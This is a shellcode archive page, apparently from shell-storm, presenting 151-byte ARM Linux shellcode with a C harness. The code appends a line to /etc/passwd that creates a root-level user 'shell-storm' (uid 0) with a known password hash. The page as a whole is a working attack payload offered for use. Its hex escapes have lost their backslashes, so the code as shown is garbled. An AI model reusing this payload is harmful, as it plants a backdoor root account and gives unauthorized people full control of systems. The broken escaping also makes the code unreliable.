Linux/ARM - add root user with password

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux/ARM - add root user with password - 151 bytes
# Published : 2010-11-25
# Author :
# Previous Title : Windows Mobile 6.5 TR Phone Call Shellcode
# Next Title : [Raspberry Pi] Linux/ARM - chmod("/etc/shadow", 0777) - 41 bytes

/*
** Title:     Linux/ARM - add root user with password - 151 bytes
** Date:      2010-11-25
** Tested on: ARM926EJ-S rev 5 (v5l)
** Author:    Jonathan Salwan - twitter: @shell_storm
**
** http://shell-storm.org
**
** Informations:
** -------------
**               - user: shell-storm
**               - pswd: toor
**               - uid : 0
*/

#include <stdio.h>


char SC[] = 
            /* Thumb mode */
            "x05x50x45xe0"  /* sub  r5, r5, r5 */
            "x01x50x8fxe2"  /* add  r5, pc, #1 */
            "x15xffx2fxe1"  /* bx   r5 */

            /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
            "x78x46"          /* mov  r0, pc */
            "x7Cx30"          /* adds r0, #124 */
            "xffx21"          /* movs r1, #255 */
            "xffx31"          /* adds r1, #255 */
            "xffx31"          /* adds r1, #255 */
            "xffx31"          /* adds r1, #255 */
            "x45x31"          /* adds r1, #69 */
            "xdcx22"          /* movs r2, #220 */
            "xc8x32"          /* adds r2, #200 */
            "x05x27"          /* movs r7, #5 */
            "x01xdf"          /* svc  1 */

            /* r8 = fd */
            "x80x46"          /* mov  r8, r0 */

            /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
            "x41x46"          /* mov  r1, r8 */
            "x08x1c"          /* adds r0, r1, #0 */
            "x79x46"          /* mov  r1, pc */
            "x18x31"          /* adds r1, #24 */
            "xc0x46"          /* nop (mov r8, r8) */
            "x48x22"          /* movs r2, #72 */
            "x04x27"          /* movs r7, #4 */
            "x01xdf"          /* svc  1 */

            /* close(fd) */
            "x41x46"          /* mov  r1, r8 */
            "x08x1c"          /* adds r0, r1, #0 */
            "x06x27"          /* movs r7, #6 */
            "x01xdf"          /* svc  1 */

            /* exit(0) */
            "x1ax49"          /* subs r1, r1, r1 */
            "x08x1c"          /* adds r0, r1, #0 */
            "x01x27"          /* movs r7, #1 */
            "x01xdf"          /* svc  1 */

            /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bashn */
            "x73x68x65x6cx6cx2dx73x74x6fx72"
            "x6dx3ax24x31x24x4bx51x59x6cx2f"
            "x79x72x75x24x50x4dx74x30x32x7a"
            "x55x54x57x6dx4dx76x50x57x63x55"
            "x34x6fx51x4cx73x2fx3ax30x3ax30"
            "x3ax72x6fx6fx74x3ax2fx72x6fx6f"
            "x74x3ax2fx62x69x6ex2fx62x61x73"
            "x68x0a"

            /* /etc/passwd */
            "x2fx65x74x63x2fx70x61x73x73x77x64";


int main(void)
{
        fprintf(stdout,"Length: %dn",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}